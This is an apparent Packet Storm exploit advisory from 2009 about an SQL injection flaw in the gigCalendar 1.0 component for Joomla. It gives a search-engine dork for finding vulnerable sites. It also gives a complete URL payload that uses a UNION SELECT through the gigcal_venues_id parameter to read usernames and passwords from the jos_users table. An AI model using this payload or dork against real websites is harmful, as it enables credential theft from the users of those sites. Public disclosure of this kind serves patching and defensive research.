Joomla gigCalender 1.0 SQL Injection gigcal_venues_id

2009-02-23T00:00:00
ID PACKETSTORM:75105
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-02-23T00:00:00

Description

                                        
                                            `******* Salvatore "drosophila" Fresta *******  
  
  
Application: gigCalendar Joomla Component 1.0  
http://joomlacode.org/gf/project/gigcalendar/  
Version: gigCalendar 1.0  
Bug: * SQL Injection  
Exploitation: Remote  
Dork: inurl:"index.php?option=com_gigcal"  
Date: 21 Feb 2009  
Discovered by:Salvatore "drosophila" Fresta  
Author: Salvatore "drosophila" Fresta  
e-mail: drosophilaxxx@gmail.com  
  
  
*************************************************  
  
- BUGS  
  
SQL Injection:  
  
Requisites: magic_quotes_gpc = off  
  
File affected: venuedetails.php  
  
This bug allows a guest to view username and  
password of a registered user.  
  
http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_venues_id=-1'  
UNION ALL SELECT 1,concat('username: ',  
username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password:  
', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23  
  
*************************************************  
  
--   
Salvatore "drosophila" Fresta  
CWNP444351  
`